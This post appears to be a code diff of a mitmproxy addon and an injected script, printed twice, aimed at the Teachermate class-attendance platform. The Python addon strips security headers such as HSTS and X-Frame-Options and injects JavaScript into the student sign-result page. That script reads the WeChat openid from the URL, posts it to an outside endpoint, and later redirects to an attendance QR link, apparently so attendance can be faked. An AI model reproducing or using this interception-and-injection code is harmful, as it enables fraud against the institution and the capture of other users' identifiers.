ttyS0 · April 11, 2021 05:49
diff --git a/inject.js b/inject.js
 const API_SYNC_OPENID = 'https://yourapi.example.com/sync_openid';
 const ACTIVE_SIGN = 'https://v18.teachermate.cn/wechat-api/v1/class-attendance/active_signs';
 const success =  window.location.search.match(/success=([^&]*)/)[1] == '1';
 const openId =  window.location.search.match(/openid=([^&]*)/)[1];

 setTimeout(() => {
    fetch(API_SYNC_OPENID, {
        method: 'POST',
        headers,
        body: JSON.stringify({ openid: openId })
    });
 }, 2000);

 setTimeout(() => {
    window.location.href = 'https://www.teachermate.com.cn/api/v1/qr/attendance/41fef8ff2bec04224d0e020fceec02f5f77439b0bdfc446b07e7d08b69e5e5a5865814be898b6bad84763654925462a2';
 }, 3600000);
diff --git a/mitm.py b/mitm.py
 from mitmproxy import ctx, http

 filtered_hosts = [
    'www.teachermate.com.cn',
    'v18.teachermate.cn'
 ]
 filtered_headers = [
    'X-Frame-Options',
    'X-Content-Type-Options',
    'X-XSS-Protection',
    'X-Download-Options',
    'Strict-Transport-Security'
 ]

 script = open("inject.js").read()

 class KeepAlive:
    def __init__(self):
        self.num = 0

    def response(self, flow):
        if flow.request.host in filtered_hosts:
            for h in filtered_headers:
                flow.response.headers.pop(h, None)
        if flow.request.host == 'v18.teachermate.cn':
            # if flow.request.path.startswith('/api/openid'):
            if flow.request.path.startswith('/wechat-pro-ssr/student/signresult'):
                flow.response.content += ("<script>" + script + "</script>").encode()


 addons = [
    KeepAlive()
 ]
	const API_SYNC_OPENID = 'https://yourapi.example.com/sync_openid';
	const ACTIVE_SIGN = 'https://v18.teachermate.cn/wechat-api/v1/class-attendance/active_signs';
	const success = window.location.search.match(/success=([^&]*)/)[1] == '1';
	const openId = window.location.search.match(/openid=([^&]*)/)[1];

	setTimeout(() => {
	fetch(API_SYNC_OPENID, {
	method: 'POST',
	headers,
	body: JSON.stringify({ openid: openId })
	});
	}, 2000);

	setTimeout(() => {
	window.location.href = 'https://www.teachermate.com.cn/api/v1/qr/attendance/41fef8ff2bec04224d0e020fceec02f5f77439b0bdfc446b07e7d08b69e5e5a5865814be898b6bad84763654925462a2';
	}, 3600000);
	from mitmproxy import ctx, http

	filtered_hosts = [
	'www.teachermate.com.cn',
	'v18.teachermate.cn'
	]
	filtered_headers = [
	'X-Frame-Options',
	'X-Content-Type-Options',
	'X-XSS-Protection',
	'X-Download-Options',
	'Strict-Transport-Security'
	]

	script = open("inject.js").read()

	class KeepAlive:
	def __init__(self):
	self.num = 0

	def response(self, flow):
	if flow.request.host in filtered_hosts:
	for h in filtered_headers:
	flow.response.headers.pop(h, None)
	if flow.request.host == 'v18.teachermate.cn':
	# if flow.request.path.startswith('/api/openid'):
	if flow.request.path.startswith('/wechat-pro-ssr/student/signresult'):
	flow.response.content += ("<script>" + script + "</script>").encode()


	addons = [
	KeepAlive()
	]